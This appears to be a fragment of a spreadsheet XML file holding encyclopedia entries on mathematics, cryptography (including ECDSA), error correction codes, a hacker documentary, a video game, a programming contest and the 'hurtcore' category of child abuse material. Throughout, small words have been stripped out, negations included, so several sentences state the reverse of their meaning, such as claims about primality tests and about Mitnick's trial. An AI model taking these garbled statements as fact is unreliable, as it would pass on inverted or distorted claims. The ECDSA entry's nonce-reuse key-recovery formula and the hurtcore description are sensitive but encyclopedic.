likewise, favourable reception received magazine elle regional daily newspapers ouest-france voix nord.mediapart panned novel, writing, "all nauseating words distilled small touches, minor mode." left-wing publications l'obs, inrockuptibles l'humanité also published unfavourable reviews novel, deviating usual acclaim houellebecq's work. l'obs criticized novel's length described yawn." footnotes references</t>
  </si>
  <si>
    <t>Averaging argument</t>
  </si>
  <si>
    <t>computational complexity theory cryptography, averaging argument standard argument proving theorems. usually allows convert probabilistic polynomial-time algorithms non-uniform polynomial-size circuits. example example: every person likes least books library, library book, least people like. proof: suppose {\displaystyle people books. each person likes least {\displaystyle b/3} books. people leave mark book like. then, least {\displaystyle m=(nb)/3} marks. averaging argument claims exists book least {\displaystyle n/3} marks assume, contradiction, book exists. then, every book fewer {\displaystyle n/3} marks. however, since {\displaystyle books, total number marks fewer {\displaystyle (nb)/3} contradicting fact least {\displaystyle marks. {\displaystyle \scriptstyle \blacksquare formalized definition averaging argument sets, predicate real number interval least elements satisfy p(x, exists exist least elements satisfy p(x, there another definition, defined using terminology probability theory.let {\displaystyle function. averaging argument following claim: circuit {\displaystyle {\displaystyle c(x,y)=f(x)} probability least {\displaystyle \rho {\displaystyle chosen random {\displaystyle chosen independently distribution {\displaystyle {\displaystyle \{0,1\}^{m}} (which might even efficiently sampleable) exists single string {\displaystyle y_{0}\in \{0,1\}^{m}} {\displaystyle _{x}[c(x,y_{0})=f(x)]\geq \rho indeed, every {\displaystyle define {\displaystyle p_{y}} {\displaystyle _{x}[c(x,y)=f(x)]} {\displaystyle _{x,y}[c(x,y)=f(x)]=e_{y}[p_{y}]\,} reduces claim every random variable {\displaystyle {\displaystyle e[z]\geq \rho {\displaystyle \pr[z\geq \rho ]&gt;0} (this holds since {\displaystyle e[z]} weighted average {\displaystyle clearly average values least {\displaystyle \rho values must least {\displaystyle \rho application this argument wide complexity theory (e.g. proving {\displaystyle {\mathsf {bpp}}\subsetneq {\mathsf {p/poly}}} cryptography (e.g. proving indistinguishable encryption results semantic security). plethora applications found goldreich's books. references</t>
  </si>
  <si>
    <t>Somer–Lucas pseudoprime</t>
  </si>
  <si>
    <t>mathematics, particular number theory, composite number somer–lucas d-pseudoprime (with given exists nondegenerate lucas sequence {\displaystyle u(p,q)} discriminant {\displaystyle d=p^{2}-4q,} {\displaystyle \gcd(n,d)=1} rank appearance sequence u(p, {\displaystyle {\frac {1}{d}}\left(n-\left({\frac {d}{n}}\right)\right),} {\displaystyle \left({\frac {d}{n}}\right)} jacobi symbol. applications unlike standard lucas pseudoprimes, known efficient primality test using lucas d-pseudoprimes. hence generally used computation. also lawrence somer, 1985 thesis, also defined somer d-pseudoprimes. they described brief page ribenbaum 1996. references somer, lawrence (1998). bergum, gerald philippou, andreas horadam, (eds.). lucas d-pseudoprimes". applications fibonacci numbers. springer netherlands. 369–375. doi:10.1007/978-94-011-5020-0_41. carlip, walter; somer, lawrence (2007). "square-free lucas d-pseudoprimes carmichael-lucas numbers". czechoslovak mathematical journal. (1). weisstein, eric "somer–lucas pseudoprime". mathworld. ribenboim, (1996). "§2.x.d somer-lucas pseudoprimes". book prime number records (3rd ed.). york: springer-verlag. 131–132.</t>
  </si>
  <si>
    <t>List of quantum key distribution protocols</t>
  </si>
  <si>
    <t>quantum distribution protocols used quantum distribution. first protocol kind bb84, introduced 1984. after that, many protocols defined. list bb84 protocol decoy state protocol: practical scheme using imperfect single photon sources, weak coherent state sources sarg04 six-state protocol protocol: entanglement protocol protocol: protocol using nonorthogonal states charles bennett bbm92 protocol: entanglement protocol msz96 protocol protocol: coherent protocol gisin protocol: differential phase shift yamamoto kmb09 protocol: high error-rate protocol khan hdqkd: high-dimensional quantum distribution</t>
  </si>
  <si>
    <t>Freedom Downtime</t>
  </si>
  <si>
    <t>freedom downtime 2001 documentary film sympathetic convicted computer hacker kevin mitnick, directed emmanuel goldstein produced 2600 films. documentary centers fate mitnick, claimed misrepresented feature film takedown (2000) produced miramax adapted book name tsutomu shimomura john markoff, based disputed events. film also documents number computer enthusiasts drive across united states searching miramax representatives demonstrating discontent certain aspects bootleg script takedown acquired. major points criticism script ended mitnick convicted serve long-term prison sentence, reality, time film's production, mitnick even trial nonetheless incarcerated five years without bail high-security facility. freedom downtime also touches happened hackers sentenced. development free kevin movement also covered. several notable iconic figures hacking community appear movie, including phiber optik (mark abene), bernie cummings), alex kasper, director emmanuel goldstein (eric corley). freedom downtime tries communicate different view hacker community usually shown mainstream media, hackers depicted curious people rarely intend cause damage, driven desire explore conduct pranks. film questions rationality placing computer hackers went "over line" environment serious felons. also contains interviews people related mitnick hacker culture general. authors hafner, katie; markoff, john (1991). cyberpunk: outlaws hackers computer frontier. york: simon schuster. isbn 0-671-68322-5., ex-couple katie hafner john markoff, appear different roles. while hafner's empathy mitnick shown grown, markoff continues defend critical book articles york times newspaper hacker. markoff ridiculed narrator, director goldstein hacker himself), points factual errors interview. reba vartanian, mitnick's grandmother, also appears number interview segments. furthermore, lawyers, friends, libertarians give view story. footage interviews hackers planet earth conventions dispel hacker myths confirm others. film premiered h2k, 2000 h.o.p.e. convention. after film limited independent theatrical release shown film festivals. released sold 2600 website. june 2004, released. includes wealth extra material spread discs, including three hours extra footage, interview kevin mitnick january 2003 (shortly supervised release ended), various eggs. also includes subtitles languages, provided volunteers. references external links freedom downtime freedom downtime imdb watch/download freedom downtime archive.org watch/download freedom downtime defcon.org</t>
  </si>
  <si>
    <t>Lattice sieving</t>
  </si>
  <si>
    <t>lattice sieving technique finding smooth values bivariate polynomial {\displaystyle f(a,b)} large region. almost exclusively used conjunction number field sieve. original idea lattice sieve came john pollard.the algorithm implicitly involves ideal structure number field polynomial; takes advantage theorem prime ideal rational prime written {\displaystyle p\mathbb [\alpha ]+(u+v\alpha )\mathbb [\alpha picks many prime numbers appropriate size, usually factor base limit, proceeds list prime ideals factorising polynomial f(a,b) {\displaystyle gf(q)} prime ideals, called 'special {\displaystyle {\mathfrak {q}}} construct reduced basis {\displaystyle \mathbf ,\mathbf lattice generated {\displaystyle {\mathfrak {q}}} two-dimensional array called sieve region zero. prime ideal {\displaystyle {\mathfrak {p}}} factor base, construct reduced basis {\displaystyle \mathbf _{\mathfrak {p}},\mathbf _{\mathfrak {p}}} sublattice generated {\displaystyle {\mathfrak {pq}}} element sublattice lying within sufficiently large sieve region, {\displaystyle \log |{\mathfrak {p}}|} entry. read entries sieve region large enough valuefor number field sieve application, necessary polynomials smooth values; handled running inner loop polynomials, whilst special-q taken either side. treatments inmost loop there number clever approaches implementing inmost loop, since listing elements lattice within rectangular region efficiently non-trivial problem, efficiently batching together updates sieve region order take advantage cache structures another non-trivial problem. normal solution first ordering lattice points defined couple generators picked decision rule takes lattice point next straightforward; normal solution second collect series lists updates sub-regions array smaller size level-2 cache, number lists roughly number lines cache adding entry list generally cache hit, applying lists updates time, application level-2 cache hit. efficient need able store number updates least comparable size sieve array, quite profligate memory usage. references</t>
  </si>
  <si>
    <t>Error correction code</t>
  </si>
  <si>
    <t>computing, telecommunication, information theory, coding theory, error correction code, sometimes error correcting code, (ecc) used controlling errors data unreliable noisy communication channels. central idea sender encodes message redundant information form ecc. redundancy allows receiver detect limited number errors occur anywhere message, often correct errors without retransmission. american mathematician richard hamming pioneered field 1940s invented first error-correcting code 1950: hamming (7,4) code.ecc contrasts error detection errors encountered corrected, simply detected. advantage system using require reverse channel request retransmission data error occurs. downside fixed overhead added message, thereby requiring higher forward-channel bandwidth. therefore applied situations retransmissions costly impossible, one-way communication links transmitting multiple receivers multicast. long-latency connections also benefit; case satellite orbiting around uranus, retransmission errors create delay five hours. information usually added mass storage devices enable recovery corrupted data, widely used modems, used systems primary memory memory. processing receiver applied digital bitstream demodulation digitally modulated carrier. latter, integral part initial analog-to-digital conversion receiver. viterbi decoder implements soft-decision algorithm demodulate digital data analog signal corrupted noise. many encoders/decoders also generate bit-error rate (ber) signal, used feedback fine-tune analog receiving electronics. maximum fractions errors missing bits corrected determined design code, different error correcting codes suitable different conditions. general, stronger code induces redundancy needs transmitted using available bandwidth, reduces effective bit-rate improving received effective signal-to-noise ratio. noisy-channel coding theorem claude shannon used compute maximum achievable communication bandwidth given maximum acceptable error probability. this establishes bounds theoretical maximum information transfer rate channel given base noise level. however, proof constructive, hence gives insight build capacity achieving code. after years research, advanced systems 2016 come close theoretical maximum. forward error correction telecommunication, information theory, coding theory, forward error correction (fec) channel coding technique used controlling errors data transmission unreliable noisy communication channels. central idea sender encodes message redundant way, often using ecc. redundancy allows receiver detect limited number errors occur anywhere message, often correct errors without re-transmission. gives receiver ability correct errors without needing reverse channel request re-transmission data, cost fixed, higher forward channel bandwidth. therefore applied situations re-transmissions costly impossible, one-way communication links transmitting multiple receivers multicast. information usually added mass storage (magnetic, optical solid state/flash based) devices enable recovery corrupted data, widely used modems, used systems primary memory memory broadcast situations, receiver capabilities request re-transmission would induce significant latency. example, case satellite orbiting uranus, re-transmission decoding errors would create delay least hours. processing receiver applied digital stream demodulation digitally modulated carrier. latter, integral part initial analog-to-digital conversion receiver. viterbi decoder implements soft-decision algorithm demodulate digital data analog signal corrupted noise. many coders also generate bit-error rate (ber) signal used feedback fine-tune analog receiving electronics. maximum proportion errors missing bits corrected determined design ecc, different forward error correcting codes suitable different conditions. general, stronger code induces redundancy needs transmitted using available bandwidth, reduces effective bit-rate improving received effective signal-to-noise ratio. noisy-channel coding theorem claude shannon answers question much bandwidth left data communication using efficient code turns decoding error probability zero. this establishes bounds theoretical maximum information transfer rate channel given base noise level. proof constructive, hence gives insight build capacity achieving code. however, years research, advanced systems like polar code achieve shannon channel capacity hypothesis infinite length frame. works accomplished adding redundancy transmitted information using algorithm. redundant complex function many original information bits. original information appear literally encoded output; codes include unmodified input output systematic, non-systematic. simplistic example transmit data times, known (3,1) repetition code. through noisy channel, receiver might versions output, table below. this allows error three samples corrected "majority vote", "democratic voting". correcting ability triplet error, bits triplet omitted (cases shown table).though simple implement widely used, triple modular redundancy relatively inefficient ecc. better codes typically examine last several tens even last several hundreds previously received bits determine decode current small handful bits (typically groups bits). averaging noise reduce errors could said work "averaging noise"; since data affects many transmitted symbols, corruption symbols noise usually allows original user data extracted other, uncorrupted received symbols also depend user data. because "risk-pooling" effect, digital communication systems tend work well certain minimum signal-to-noise ratio this all-or-nothing tendency cliff effect becomes pronounced stronger codes used closely approach theoretical shannon limit. interleaving coded data reduce nothing properties transmitted codes channel errors tend occur bursts. however, method limits; best used narrowband data.most telecommunication systems fixed channel code designed tolerate expected worst-case error rate, fail work error rate ever worse. however, systems adapt given channel error conditions: instances hybrid automatic repeat-request fixed method long handle error rate, switch error rate gets high; adaptive modulation coding uses variety rates, adding error-correction bits packet higher error rates channel, taking needed. types main categories codes block codes convolutional codes. block codes work fixed-size blocks (packets) bits symbols predetermined size. practical block codes generally hard-decoded polynomial time block length. convolutional codes work symbol streams arbitrary length. they often soft decoded viterbi algorithm, though algorithms sometimes used. viterbi decoding allows asymptotically optimal decoding efficiency increasing constraint length convolutional code, expense exponentially increasing complexity. convolutional code terminated also 'block code' encodes block input data, block size convolutional code generally arbitrary, block codes fixed size dictated algebraic characteristics. types termination convolutional codes include "tail-biting" "bit-flushing".there many types block codes; reed–solomon coding noteworthy widespread compact discs, dvds, hard disk drives. other examples classical block codes include golay, bch, multidimensional parity, hamming codes. hamming commonly used correct nand flash memory errors. this provides single-bit error correction 2-bit error detection. hamming codes suitable reliable single-level cell (slc) nand. denser multi-level cell (mlc) nand multi-bit correcting reed–solomon. flash typically error correction.classical block codes usually decoded using hard-decision algorithms, means every input output signal hard decision made whether corresponds zero bit. contrast, convolutional codes typically decoded using soft-decision algorithms like viterbi, bcjr algorithms, process (discretized) analog signals, allow much higher error-correction performance hard-decision decoding. nearly classical block codes apply algebraic properties finite fields. hence classical block codes often referred algebraic codes. contrast classical block codes often specify error-detecting error-correcting ability, many modern block codes ldpc codes lack guarantees. instead, modern codes evaluated terms error rates. most forward error correction codes correct bit-flips, bit-insertions bit-deletions. setting, hamming distance appropriate measure error rate. forward error correction codes designed correct bit-insertions bit-deletions, marker codes watermark codes. levenshtein distance appropriate measure error rate using codes. code-rate tradeoff reliability data rate fundamental principle redundant bits order help decoder find true message encoded transmitter. code-rate given system defined ratio number information bits total number bits (i.e., information plus redundancy bits) given communication package. code-rate hence real number. code-rate close zero implies strong code uses many redundant bits achieve good performance, large code-rate close implies weak code. redundant bits protect information transferred using communication resources trying protect. this causes fundamental tradeoff reliability data rate. extreme, strong code (with code-rate) induce important increase receiver (signal-to-noise-ratio) decreasing error rate, cost reducing effective data rate. extreme, using (i.e., code-rate equal uses full channel information transfer purposes, cost leaving bits without additional protection. interesting question following: efficient terms information transfer negligible decoding error rate? this question answered claude shannon second theorem, says channel capacity maximum rate achievable whose error rate tends zero: proof relies gaussian random coding, suitable real-world applications. upper bound given shannon's work inspired long journey designing eccs come close ultimate performance boundary. various codes today attain almost shannon limit. however, capacity achieving eccs usually extremely complex implement. popular eccs trade-off performance computational complexity. usually, parameters give range possible code rates, optimized depending scenario. usually, optimization done order achieve decoding error probability minimizing impact data rate. another criterion optimizing code rate balance error rate retransmissions number order energy cost communication. concatenated codes improved performance classical (algebraic) block codes convolutional codes frequently combined concatenated coding schemes short constraint-length viterbi-decoded convolutional code work block code (usually reed–solomon) larger symbol size block length "mops errors made convolutional decoder. single pass decoding family error correction codes yield error rates, long range transmission conditions (like deep space) iterative decoding recommended. concatenated codes standard practice satellite deep space communications since voyager first used technique 1986 encounter uranus. galileo craft used iterative concatenated codes compensate high error rate conditions caused failed antenna. low-density parity-check (ldpc) low-density parity-check (ldpc) codes class highly efficient linear block codes made many single parity check (spc) codes. they provide performance close channel capacity (the theoretical maximum) using iterated soft-decision decoding approach, linear time complexity terms block length. practical implementations rely heavily decoding constituent codes parallel. ldpc codes first introduced robert gallager thesis 1960, computational effort implementing encoder decoder introduction reed–solomon codes, mostly ignored 1990s. ldpc codes used many recent high-speed communication standards, dvb-s2 (digital video broadcasting satellite second generation), wimax (ieee 802.16e standard microwave communications), high-speed wireless (ieee 802.11n), 10gbase-t ethernet (802.3an) g.hn/g.9960 (itu-t standard networking power lines, phone lines coaxial cable). other ldpc codes standardized wireless communication standards within 3gpp mbms (see fountain codes). turbo codes turbo coding iterated soft-decoding scheme combines relatively simple convolutional codes interleaver produce block code perform within fraction decibel shannon limit. predating ldpc codes terms practical application, provide similar performance. earliest commercial applications turbo coding cdma2000 (tia is-2000) digital cellular technology developed qualcomm sold verizon wireless, sprint, carriers. also used evolution cdma2000 specifically internet access, 1xev-do (tia is-856). like ev-do developed qualcomm, sold verizon wireless, sprint, carriers (verizon's marketing name 1xev-do broadband access, sprint's consumer business marketing names 1xev-do power vision mobile broadband, respectively). local decoding testing codes sometimes necessary decode single bits message, check whether given signal codeword, without looking entire signal. this make sense streaming setting, codewords large classically decoded fast enough bits message interest now. also codes become important tool computational complexity theory, e.g., design probabilistically checkable proofs. locally decodable codes error-correcting codes single bits message probabilistically recovered looking small (say constant) number positions codeword, even codeword corrupted constant fraction positions. locally testable codes error-correcting codes checked probabilistically whether signal close codeword looking small number positions signal. interleaving interleaving frequently used digital communication storage systems improve performance forward error correcting codes. many communication channels memoryless: errors typically occur bursts rather independently. number errors within code word exceeds error-correcting code's capability, fails recover original code word. interleaving alleviates problem shuffling source symbols across several code words, thereby creating uniform distribution errors. therefore, interleaving widely used burst error-correction. analysis modern iterated codes, like turbo codes ldpc codes, typically assumes independent distribution errors. systems using ldpc codes therefore typically employ additional interleaving across symbols within code word.for turbo codes, interleaver integral component proper design crucial good performance. iterative decoding algorithm works best short cycles factor graph represents decoder; interleaver chosen avoid short cycles. interleaver designs include: rectangular uniform) interleavers (similar method using skip factors described above) convolutional interleavers random interleavers (where interleaver known random permutation) s-random interleaver (where interleaver known random permutation constraint input symbols within distance appear within distance output). contention-free quadratic permutation polynomial (qpp). example 3gpp long term evolution mobile telecommunication standard.in multi-carrier communication systems, interleaving across carriers employed provide frequency diversity, e.g., mitigate frequency-selective fading narrowband interference. example transmission without interleaving: error-free message: aaaabbbbccccddddeeeeffffgggg transmission burst error: aaaabbbbccc____deeeeffffgggg here, group letter represents 4-bit one-bit error-correcting codeword. codeword cccc altered corrected, codeword dddd altered three bits, either cannot decoded might decoded incorrectly. with interleaving: error-free code words: aaaabbbbccccddddeeeeffffgggg interleaved: abcdefgabcdefgabcdefgabcdefg transmission burst error: abcdefgabcd____bcdefgabcdefg received code words deinterleaving: aa_abbbbccccdddde_eef_ffg_gg codewords "aaaa", "eeee", "ffff", "gggg", altered, one-bit error-correcting code decode everything correctly. transmission without interleaving: original transmitted sentence: thisisanexampleofinterleaving received sentence burst error: thisis______pleofinterleaving term "anexample" ends mostly unintelligible difficult correct. with interleaving: transmitted sentence: thisisanexampleofinterleaving... error-free transmission: tiepfeaghsxlirv.iaaenli.snmoten. received sentence burst error: tiepfe______irv.iaaenli.snmoten. received sentence deinterleaving: t_isi_ane_amp_eofinterle_vin_... word completely lost missing letters recovered minimal guesswork. disadvantages interleaving interleaving techniques increases total delay. this entire interleaved block must received packets decoded. also interleavers hide structure errors; without interleaver, advanced decoding algorithms take advantage error structure achieve reliable communication simpler decoder combined interleaver. example algorithm based neural network structures. software error-correcting codes simulating behaviour error-correcting codes (eccs) software common practice design, validate improve eccs. upcoming wireless standard raises range applications software eccs: cloud radio access networks (c-ran) software-defined radio (sdr) context. idea directly software eccs communications. instance software eccs could located cloud antennas connected computing resources: improving flexibility communication network eventually increasing energy efficiency system. context, various available open-source software listed (non exhaustive). aff3ct(a fast forward error correction toolbox): full communication chain (many supported codes like turbo, ldpc, polar codes, etc.), fast specialized channel coding (can used program simulations library sdr). it++: library classes functions linear algebra, numerical optimization, signal processing, communications, statistics. openair: implementation 3gpp specifications concerning evolved packet core networks. list error-correcting codes codes code, designed correct arbitrary number errors code block. barker code used radar, telemetry, ultra sound, wifi, dsss mobile phone networks, etc. berger code constant-weight code convolutional code expander codes group codes golay codes, binary golay code practical interest goppa code, used mceliece cryptosystem hadamard code hagelbarger code hamming code latin square based code non-white noise (prevalent example broadband powerlines) lexicographic code linear network coding, type erasure correcting code across networks instead point-to-point links long code low-density parity-check code, also known gallager code, archetype sparse graph codes code, near-optimal rateless erasure correcting code (fountain code) codes nordstrom-robinson code, used geometry group theory online code, near-optimal rateless erasure correcting code polar code (coding theory) raptor code, near-optimal rateless erasure correcting code reed–solomon error correction reed–muller code repeat-accumulate code repetition codes, triple modular redundancy spinal code, rateless, nonlinear code based pseudo-random hash functions tornado code, near-optimal erasure correcting code, precursor fountain codes turbo code walsh–hadamard code cyclic redundancy checks (crcs) correct 1-bit errors messages {\displaystyle 2^{n-1}-1} bits long optimal generator polynomials degree {\displaystyle mathematics cyclic redundancy checks#bitfilters also code rate erasure codes soft-decision decoder burst error-correcting code error detection correction error-correcting codes feedback references further reading macwilliams, florence jessiem; sloane, neil james alexander (2007) [1977]. written at&amp;t shannon labs, florham park, jersey, usa. theory error-correcting codes. north-holland mathematical library. vol. (digital print 12th impression, ed.). amsterdam london york tokyo: north-holland elsevier isbn 978-0-444-85193-2. lccn 76-41296. (xxii+762+6 pages) clark, jr., george cain, bibb (1981). error-correction coding digital communications. york, usa: plenum press. isbn 0-306-40615-2. arazi, benjamin (1987). swetman, herb (ed.). commonsense approach theory error correcting codes. press series computer systems. vol. ed.). cambridge, massachusetts, london, massachusetts institute technology. isbn 0-262-01098-4. lccn 87-21889. (x+2+208+4 pages) wicker, stephen (1995). error control systems digital communication storage. englewood cliffs, jersey, usa: prentice-hall. isbn 0-13-200809-2. wilson, stephen (1996). digital modulation coding. englewood cliffs, jersey, usa: prentice-hall. isbn 0-13-210071-1. "error correction code single level cell nand flash memories" 2007-02-16 "error correction code nand flash memories" 2004-11-29 observations errors, corrections, trust dependent systems, james hamilton, 2012-02-26 sphere packings, lattices groups, conway, neil james alexander sloane, springer science business media, 2013-03-09 mathematics pages. external links morelos-zaragoza, robert (2004). "the correcting codes (ecc) page". retrieved march 2006. lpdec: library decoding related things (python)</t>
  </si>
  <si>
    <t>Hurtcore</t>
  </si>
  <si>
    <t>hurtcore, portmanteau "hardcore" "hurt", name given particularly extreme form child pornography, usually involving degrading violence, bodily harm child sexual abuse. eileen ormsby, australian writer author darkest web, described hurtcore fetish people aroused infliction pain, even torture, another person willing participant". additional motivation perpetrator, next position power victim(s), reaction victim(s) physical abuse, like crying screaming pain. this reaction stimulate arousal perpetrator even more. some dark forums dedicated discussion, sharing images videos, hurtcore. 2013, "hurt2thecore" dark web's notorious hurtcore forum, matthew graham, became known "king hurtcore" "one biggest child pornography hurtcore distributors world".the case matthew falder national crime agency's first successful hurtcore prosecution. references external links inside repulsive world 'hurtcore', worst crimes imaginable vice 'lux' child pornography crimes awful print</t>
  </si>
  <si>
    <t>Protocol composition logic</t>
  </si>
  <si>
    <t>protocol composition logic formal method used proving security properties protocols symmetric public cryptography. designed around process calculi actions possible protocol steps like generating random number, perform encryption decryption, send receive messages digital signature verification actions. some problems logic found implying currently claimed proofs cannot proven within logic. references</t>
  </si>
  <si>
    <t>BAPC</t>
  </si>
  <si>
    <t>benelux algorithm programming contest (bapc) programming contest students belgium, netherlands, luxembourg. organized annually institution higher education. from 1991 2004, contest held name (dutch programming championship). organisation since 2006, bapc official preliminary nwerc (north western european regional contest), organized (association computing machinery). practice, means participating institutions determine teams send nwerc based results bapc. teams nwerc (typically three), invited take part acm-icpc world finals. month bapc, preliminary round held determine teams allowed represent institution bapc. besides student ranking, ranking companies. however, contest participants. contest format team consists most, three people five hours solve problems. during contest, team allowed single computer. problems algorithmic nature varying degree difficulty. judging solutions problem, form computer programs, submitted once. bapc jury checks whether submission satisfies certain criteria replies simple verdict. case submitted program gives correct answer predefined tests within allotted time, response accepted correct. program requires much time pass tests, jury reply time limit exceeded. terminates error, response runtime error, program terminates correctly, pass tests, reply wrong answer incorrect. under circumstances jury give hints caused error, tests failed, scoring solved problem, point awarded. point scored within first four hours contest, helium balloon attached team's computer. after four hours, scoreboard longer updated, remains secret award ceremony. ties solved time penalty (the lower, better). every team starts penalty time minutes. every solved problem, time start contest correct submission minutes added time penalty. every prior wrong submission solved problem, minutes added. wrong submissions problems eventually solved affect team's score. prizes prizes three teams typically power two. 2008, example, prizes first, second, third student teams 1024, 512, euro respectively. best company team received euro. participation costs companies euro team, participation student teams free. history 1997, company team bolesian (victor allis, seppo pieterse, paul-erik raué) defeated student teams crowned dutch champion.in 1998, company team quintiq (victor allis, seppo pieterse paul-erik raué) defeated student teams, best student team declared official winner.in 2020, contest held online governmental regulations regarding covid-19 pandemic references external links website bapc chipcie archief acm-icpc website</t>
  </si>
  <si>
    <t>Lethal Xcess</t>
  </si>
  <si>
    <t>lethal xcess, also known lethal xcess: wings death wings death shoot game developed members demo crew x-troll published eclipse software 1991 atari amiga. sequel 1990's wings death, wizard hero goes future fight descendants evil witch defeated first game. despite acclaimed critics, game commercial failure. gameplay plot great magician sagyr nemesis, wicked witch xandrilia, regained human shape former self. xandrilia's curse sends 3,000 years future. there finds witch's posterity, known xandrilians, plan rule universe army monsters machines. determined stop forces darkness, sagyr pilots small combat spacecraft desperate mission destroy planet xandrilians live. development lethal xcess originally planned independent release, became sequel wings death original story sagyr turned gryphon fighting restored xandrilia fantasy setting, titled xandrilia's revenge, decided would science fiction game. lethal xcess first commercial project heinz rudolf claus frein, although offers before; disappointing sales, quit gaming industry became consultants. while rather standard shooter amiga platform, game technically impressive titles atari besides many technically impressive features, digital sound, sync-scrolling, overscan, full two-player support, original copies lethal xcess featured dual format, allowed amiga atari versions boot disk. abortive commodore version also development different team. reception amiga version game well received, including review scores amiga action, amiga computing, amiga power, génération joystick. received overall rating news graveyard, play time gave amiga atari references external links official website lethal xcess mobygames lethal xcess: wings death amiga database lethal xcess longplay atari ste, youtube.</t>
  </si>
  <si>
    <t>Elliptic Curve Digital Signature Algorithm</t>
  </si>
  <si>
    <t>cryptography, elliptic curve digital signature algorithm (ecdsa) offers variant digital signature algorithm (dsa) uses elliptic-curve cryptography. signature-size elliptic-curve cryptography general, size private believed needed ecdsa twice size security level, bits. example, security level bits—meaning attacker requires maximum {\displaystyle 2^{80}} operations find private key—the size ecdsa private would bits. hand, signature size ecdsa: approximately {\displaystyle bits, {\displaystyle security level measured bits, bits security level bits. signature generation algorithm suppose alice wants send signed message bob. initially, must agree curve parameters curve {\displaystyle ({\textrm {curve}},g,n)} addition field equation curve, need {\displaystyle base point prime order curve; {\displaystyle multiplicative order point {\displaystyle order {\displaystyle base point {\displaystyle must prime. indeed, assume every nonzero element ring {\displaystyle \mathbb /n\mathbb invertible, {\displaystyle \mathbb /n\mathbb must field. implies {\displaystyle must prime (cf. bézout's identity). alice creates pair, consisting private integer {\displaystyle d_{a}} randomly selected interval {\displaystyle [1,n-1]} public curve point {\displaystyle q_{a}=d_{a}\times {\displaystyle \times denote elliptic curve point multiplication scalar. alice sign message {\displaystyle follows steps: calculate hash {\displaystyle e={\textrm {hash}}(m)} (here hash cryptographic hash function, sha-2, output converted integer.) {\displaystyle {\displaystyle l_{n}} leftmost bits {\displaystyle {\displaystyle l_{n}} length group order {\displaystyle (note {\displaystyle greater {\displaystyle longer.) select cryptographically secure random integer {\displaystyle {\displaystyle [1,n-1]} calculate curve point {\displaystyle (x_{1},y_{1})=k\times calculate {\displaystyle r=x_{1}\,{\bmod {\,}}n} {\displaystyle r=0} back step calculate {\displaystyle s=k^{-1}(z+rd_{a})\,{\bmod {\,}}n} {\displaystyle s=0} back step signature pair {\displaystyle (r,s)} (and {\displaystyle (r,-s\,{\bmod {\,}}n)} also valid signature.) standard notes, required {\displaystyle secret, also crucial select different {\displaystyle different signatures, otherwise equation step solved {\displaystyle d_{a}} private key: given signatures {\displaystyle (r,s)} {\displaystyle (r,s')} employing unknown {\displaystyle different known messages {\displaystyle {\displaystyle attacker calculate {\displaystyle {\displaystyle since {\displaystyle s-s'=k^{-1}(z-z')} (all operations paragraph done modulo {\displaystyle attacker find {\displaystyle k={\frac {z-z'}{s-s'}}} since {\displaystyle s=k^{-1}(z+rd_{a})} attacker calculate private {\displaystyle d_{a}={\frac {sk-z}{r}}} this implementation failure used, example, extract signing used playstation gaming-console.another ecdsa signature leak private keys {\displaystyle generated faulty random number generator. such failure random number generation caused users android bitcoin wallet lose funds august 2013.to ensure {\displaystyle unique message, bypass random number generation completely generate deterministic signatures deriving {\displaystyle message private key. signature verification algorithm authenticate alice's signature, must copy public-key curve point {\displaystyle q_{a}} verify {\displaystyle q_{a}} valid curve point follows: check {\displaystyle q_{a}} equal identity element coordinates otherwise valid check {\displaystyle q_{a}} lies curve check {\displaystyle n\times q_{a}=o} after that, follows steps: verify integers {\displaystyle [1,n-1]} not, signature invalid. calculate hash {\displaystyle e={\textrm {hash}}(m)} hash function used signature generation. {\displaystyle l_{n}} leftmost bits calculate {\displaystyle u_{1}=zs^{-1}\,{\bmod {\,}}n} {\displaystyle u_{2}=rs^{-1}\,{\bmod {\,}}n} calculate curve point {\displaystyle (x_{1},y_{1})=u_{1}\times g+u_{2}\times q_{a}} {\displaystyle (x_{1},y_{1})=o} signature invalid. signature valid {\displaystyle r\equiv x_{1}{\pmod {n}}} invalid otherwise.note efficient implementation would compute inverse {\displaystyle s^{-1}\,{\bmod {\,}}n} once. also, using shamir's trick, scalar multiplications {\displaystyle u_{1}\times g+u_{2}\times q_{a}} calculated faster scalar multiplications done independently. correctness algorithm immediately obvious verification even functions correctly. why, denote curve point computed step verification, {\displaystyle c=u_{1}\times g+u_{2}\times q_{a}} from definition public {\displaystyle q_{a}=d_{a}\times {\displaystyle c=u_{1}\times g+u_{2}d_{a}\times because elliptic curve scalar multiplication distributes addition, {\displaystyle c=(u_{1}+u_{2}d_{a})\times expanding definition {\displaystyle u_{1}} {\displaystyle u_{2}} verification step {\displaystyle c=(zs^{-1}+rd_{a}s^{-1})\times collecting common term {\displaystyle s^{-1}} {\displaystyle c=(z+rd_{a})s^{-1}\times expanding definition signature step {\displaystyle c=(z+rd_{a})(z+rd_{a})^{-1}(k^{-1})^{-1}\times since inverse inverse original element, product element's inverse element identity, left {\displaystyle c=k\times from definition verification step this shows correctly signed message verify correctly; many properties required secure signature algorithm. public recovery given message alice's signature {\displaystyle r,s} message, (potentially) recover alice's public key: verify integers {\displaystyle [1,n-1]} not, signature invalid. calculate curve point {\displaystyle r=(x_{1},y_{1})} {\displaystyle x_{1}} {\displaystyle {\displaystyle r+n} {\displaystyle r+2n} etc. (provided {\displaystyle x_{1}} large field element) {\displaystyle y_{1}} value curve equation satisfied. note several curve points satisfying conditions, different value results distinct recovered key. calculate hash {\displaystyle e={\textrm {hash}}(m)} hash function used signature generation. {\displaystyle l_{n}} leftmost bits calculate {\displaystyle u_{1}=-zr^{-1}\,{\bmod {\,}}n} {\displaystyle u_{2}=sr^{-1}\,{\bmod {\,}}n} calculate curve point {\displaystyle q_{a}=(x_{a},y_{a})=u_{1}\times g+u_{2}\times signature valid {\displaystyle q_{a}} matches alice's public key. signature invalid possible points tried none match alice's public key.note invalid signature, signature different message, result recovery incorrect public key. recovery algorithm used check validity signature signer's public hash) known beforehand. correctness recovery algorithm start definition {\displaystyle q_{a}} recovery step {\displaystyle q_{a}=(x_{a},y_{a})=u_{1}\times g+u_{2}\times from definition {\displaystyle r=(x_{1},y_{1})=k\times signing step {\displaystyle q_{a}=u_{1}\times g+u_{2}k\times because elliptic curve scalar multiplication distributes addition, {\displaystyle q_{a}=(u_{1}+u_{2}k)\times expanding definition {\displaystyle u_{1}} {\displaystyle u_{2}} recovery step {\displaystyle q_{a}=(-zr^{-1}+skr^{-1})\times expanding definition signature step {\displaystyle q_{a}=(-zr^{-1}+k^{-1}(z+rd_{a})kr^{-1})\times since product element's inverse element 